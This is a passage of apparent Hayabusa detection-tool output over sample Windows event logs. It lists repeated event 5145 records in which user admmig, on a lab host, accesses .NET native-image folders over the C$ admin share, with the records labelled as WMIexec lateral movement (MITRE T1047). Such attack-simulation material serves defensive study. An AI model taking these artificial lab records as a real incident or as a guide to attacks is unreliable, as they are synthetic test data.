Windows\assembly\NativeImages_v4.0.30319_32\MMCEx\85a6f67f65de23064f7deded08a464c5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon\52b6052b9447848191f40e69c88f0f8b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild\2965d6f0cc081ef81005efec548f72a9 : IP 
Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\c90ef9a73ea0044641d31b19023aad61 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt\2c945f157cd851b9dc43e99e9a89b34d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr\0ed1ed0e250773e63d7fe047dde76c81 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napinit : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napinit\1264f8bd57934a4941865b3c0512803e : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napsnap : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napsnap\5ab2511c5224a660e85286b3f2c2b752 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57#\cc32e4d4e4dfbff56d3ae35134c1f38e : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8#\6a2929eeb7b5fa6ff9ef1b0f4ff440f1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67#\efd939ad16f7521ac6c0c15afdcb2fa2 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64#\8bb4776b03f3c369fd0c81c51cf468ac : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\92388fbe99436e6ed1f56ee56f10c565 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe#\9bb6d55c49486153c1c1872929def220 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c#\373b26e93f287f3cda45a6282a1de0d3 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b#\9551a2df153a961cbbcb79bca937a833 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877#\db7fe97a2a840dcc0278f7af89ea7fbe : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c#\be1a119716bb1de8469b568ec9e31d9c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca#\e1c86f334a29d92ca264950085cd817e : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded#\8bda9cd4f7d015f685bae38300b2c281 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5#\276763baa173e2b94a6318e28594e7ee : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\619034abb9a9fb1b3dc32c0a9aa38d3c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI\e4b5f01da74352b18e1dffd68b611367 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework\8a1ed041bc25980a548a96cf4b78f4b6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413#\6f2318339b6bd916c3c62b95c91b305d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\352d34797f7cd44cd0973c33539200f1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost\a4c49e23c0c23b5db4c663738eac897e : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn\d82382933ba69165a4398eba2fb6c0b2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System\c24d08cc4e93fc4f6f15a637b00a2721 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628#\1a6ec0d19dfcc35f62014ff3602e6a54 : IP Address: 